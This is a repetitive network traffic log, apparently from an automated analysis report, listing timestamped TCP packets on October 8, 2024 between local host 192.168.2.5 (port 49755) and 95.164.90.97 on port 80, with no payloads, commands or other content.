Oct 8, 2024 20:47:31.164881945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164891005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164916992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.164925098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164959908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.164997101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165030003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165043116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165077925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165150881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165183067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165205956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165225029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165237904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165271044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165287971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165307999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165318966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165339947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165352106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165374041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165385962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165406942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165419102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165441036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165451050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165473938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165488005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165508986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165518999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165541887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165549040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165576935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165585041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165621996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165827036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165838003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165847063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165858030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165868998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165879011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165889978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165900946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165910006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165913105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165920019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165925026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165930986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165941954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165951967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165955067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165962934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165975094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165982962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.165986061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165996075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.165997028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.166006088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.166017056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.166024923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.166028976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.166050911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.166069984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.247991085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.248055935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.248060942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.248101950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271594048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271647930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271672964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271682978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271696091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271725893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271750927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271784067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271795988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271817923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271827936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271852970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271862030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271898031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271934986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271965027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.271981955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.271998882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272008896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272042036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272252083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272284985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272308111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272319078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272329092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272352934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272362947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272387028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272396088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272416115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272428989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272466898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272468090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272511959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272521019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272553921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272564888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272587061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272597075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272619963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272627115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272660017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272670031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272691011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272701979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272723913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272733927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272757053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272768974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272790909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272800922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272825003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272835970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272859097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272870064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272891998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272902966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272926092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272937059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272964001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.272969961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.272996902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273006916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273030043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273040056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273061991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273073912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273102045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273111105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273145914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273194075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273225069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273238897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273257971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273267984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273291111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273298979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273332119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273341894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273375034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273386002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273406982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273416996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273439884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273451090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273469925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273482084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273504019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273514986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273536921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273545980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273569107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273577929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273603916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273612976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273637056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273647070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273669958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273679972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273701906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273713112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273735046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273746014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273768902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273778915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273802042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273813963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273834944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273844957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273869038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273878098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273901939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273911953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273938894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.273946047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.273983002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274260044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274293900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274317980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274322033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274342060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274353981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274363041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274386883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274396896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274418116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274430990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274451017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274461031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274483919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274492979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274518013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274528027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274550915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274559021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274585009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274595022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274619102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274630070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274652004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274662018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274704933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274713039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274753094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274836063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274885893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274889946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274919987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274931908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274954081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274965048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.274986982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.274996996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275021076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275032043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275053024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275063992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275084019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275101900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275125027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275136948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275158882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275168896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275197029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275204897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275233984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275242090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275266886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275278091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275300980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275312901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275333881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275343895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275367975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275378942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275412083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275423050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275455952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275465965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275487900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275496006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275521040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275531054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275556087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275568008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275603056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275801897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275813103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275821924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275834084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275846004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275851965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275856972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275866985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275877953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275887012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275888920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275898933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275907040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275909901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275912046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275919914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275932074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275942087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275948048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275950909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275962114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275966883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275971889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275984049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.275984049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.275994062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276005030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276007891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276016951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276030064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276034117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276038885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276041985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276052952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276074886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276093960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276664019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276675940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276685953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276696920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276707888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276719093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276719093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276726007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276731014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276741982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276748896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276752949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.276776075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.276793003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358692884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358757019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358757019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358768940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358781099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358793020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358799934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358803988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358819008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358849049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358880043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358891010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358901978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358922958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358935118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358943939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358947039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358957052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358968019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.358978033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.358978987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359003067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359028101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359050989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359091997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359136105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359170914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359184027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.359205961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.359217882 CEST	49755	80	192.168.2.5	95.164.90.97
